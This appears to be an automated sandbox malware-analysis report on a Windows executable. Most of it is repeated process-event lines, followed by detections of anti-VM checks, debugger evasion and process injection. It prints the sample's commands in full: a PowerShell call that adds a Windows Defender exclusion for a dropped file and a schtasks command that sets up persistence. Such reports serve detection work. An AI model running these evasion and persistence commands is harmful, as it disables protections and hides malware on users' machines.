              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Yara detected AntiVM3
              Source: Yara matchFile source: Process Memory Space: vQyKfYxzXB.exe PID: 7548, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RTdozXra.exe PID: 8036, type: MEMORYSTR
              Delayed program exit found
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_0040E18D Sleep,ExitProcess,15_2_0040E18D
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeMemory allocated: 30F0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeMemory allocated: 32E0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeMemory allocated: 52E0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeMemory allocated: 1440000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeMemory allocated: 3100000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeMemory allocated: 2F00000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,15_2_004186FE
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7677Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1687Jump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeWindow / User API: threadDelayed 2631Jump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeWindow / User API: threadDelayed 7362Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeAPI coverage: 5.0 %
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe TID: 7600Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8024Thread sleep time: -7378697629483816s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8012Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe TID: 7952Thread sleep count: 2631 > 30Jump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe TID: 7952Thread sleep time: -7893000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe TID: 7952Thread sleep count: 7362 > 30Jump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe TID: 7952Thread sleep time: -22086000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe TID: 8068Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,15_2_0041A01B
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,15_2_0040B28E
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_0040838E
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_004087A0
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,15_2_00407848
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_004068CD FindFirstFileW,FindNextFileW,15_2_004068CD
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_0044BA59 FindFirstFileExA,15_2_0044BA59
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,15_2_0040AA71
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,15_2_00417AAB
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,15_2_0040AC78
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,15_2_00406D28
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: vQyKfYxzXB.exe, 0000000A.00000002.3751309222.0000000001757000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_004327AE
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,15_2_0041A8DA
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_004407B5 mov eax, dword ptr fs:[00000030h]15_2_004407B5
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_00410763 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,15_2_00410763
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_004327AE
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_004328FC SetUnhandledExceptionFilter,15_2_004328FC
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_004398AC
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00432D5C
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Adds a directory exclusion to Windows Defender
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTdozXra.exe"
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTdozXra.exe"Jump to behavior
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeMemory written: C:\Users\user\Desktop\vQyKfYxzXB.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeMemory written: C:\Users\user\AppData\Roaming\RTdozXra.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe15_2_00410B5C
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_004175E1 mouse_event,15_2_004175E1
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTdozXra.exe"Jump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTdozXra" /XML "C:\Users\user\AppData\Local\Temp\tmp8902.tmp"Jump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess created: C:\Users\user\Desktop\vQyKfYxzXB.exe "C:\Users\user\Desktop\vQyKfYxzXB.exe"Jump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess created: C:\Users\user\Desktop\vQyKfYxzXB.exe "C:\Users\user\Desktop\vQyKfYxzXB.exe"Jump to behavior
